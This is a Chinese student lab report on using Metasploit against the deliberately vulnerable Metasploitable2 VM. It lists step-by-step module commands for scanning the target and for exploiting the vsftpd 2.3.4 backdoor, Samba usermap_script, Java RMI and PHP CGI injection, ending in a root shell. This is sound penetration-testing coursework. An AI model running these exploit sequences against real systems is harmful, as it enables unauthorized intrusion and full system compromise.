20222303 2024-2025-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

1.1 本周学习内容回顾

使用了Metasploit框架,其是一个功能强大的渗透测试框架。在使用的过程当中,Metasploit 提供了种类繁多的攻击模块,涵盖了远程代码执行、服务拒绝、提权等多种攻击方式,支持对多种操作系统和应用程序进行测试。除了漏洞利用,它还具备强大的后渗透功能,如键盘记录、文件上传下载、网络嗅探等。
其次还使用了一些信息收集的工具,如nmap,Nessus等,用于漏洞检测、信息收据等操作。

1.2 实验要求

本实践目标是掌握metasploit的用法。
指导书参考Rapid7官网的指导教程。
https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/
下载官方靶机Metasploitable2,完成实验内容。
查询靶机IP地址,得到结果为192.168.3.31
image

2.实验过程

2.1 前期渗透

2.1.1 主机发现(可用Aux中的arp_sweep,search一下就可以use)

search arp_sweep
use 0
set RHOSTS 192.168.3.0/24
set THREADS 30
exploit
image

从图中可以看到,我们已经成功的查询到靶机:192.168.3.31

2.1.2 端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等

search portscan/tcp
set ROHSTS 192.168.3.31
exploit
image
image

2.1.3 扫描系统版本、漏洞

search auxiliary/scanner/smb/smb_version
use 0
set RHOSTS 192.168.3.31
exploit
image

从图上可以看到,目标主机的操作系统是Unix,版本是Samba 3.0.20-Debain,且使用SMBv1,存在已知漏洞。

2.2 Vsftpd源码包后门漏洞(21端口)

漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
search exploit/unix/ftp/vsftpd_234_backdoor
use 0
set RHOST 192.168.3.31
exploit
攻击完以后,输入pwd、uname -a、id等指令检测是否攻击成功。
image

2.3 SambaMS-RPC Shell命令注入漏洞(端口139)

漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。

search exploit/multi/samba/usermap_script
use 0
set RHOST 192.168.3.31
exploit
利用成功 执行uname–a验证
image

2.4 Java RMI SERVER命令执行漏洞(1099端口)

漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
首先,根据以前的TCP扫描得出的结果,可以得知1099端口已开放。
image

search exploit/multi/misc/java_rmi_server
use 0
show options //查看配置参数
set RHOST 192.168.3.31
exploit
image
image

执行攻击后,使用指令sessions -i 3进入任务
再输入shell,利用whoami指令验证,得到结果:root

image

2.5 PHP CGI参数执行注入漏洞(80端口)

漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

search exploit/multi/http/php_cgi_arg_injection
use 0
set RHOST 192.168.3.31
exploit
攻击成功,输入dir验证:
image

3.问题及解决方案

没有遇到问题,实验比较顺利。

4.学习感悟、思考等

这次试验整体比较简单,因此没有遇到太多困难。在此次实验中,我主要感受到了Metasploit框架的强大与灵活性,Metasploit强大的模块化结构和自动化能力让我在进行攻击时更加高效,它不仅支持各种已知漏洞的利用,还包括了扫描、信息收集、社会工程学攻击等工具。通过Metasploit,我能够快速发现靶机的漏洞,并利用这些漏洞实现对靶机的远程控制。不禁让我感觉到我也站在前人的肩膀上,同时也使我感受到网络安全的重要性。总而言之,这次实验不仅提升了我的技术能力,使我对网络攻防这门课程有了更多的兴趣,更让我对网络安全有了更加全面的认识。

参考资料

Metasploit-Sessions Command 使用技巧(https://cloud.tencent.com/developer/news/256413)
https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/

posted @ 2024-11-16 19:52  便便狗  Views(10)  Comments(0Edit  收藏  举报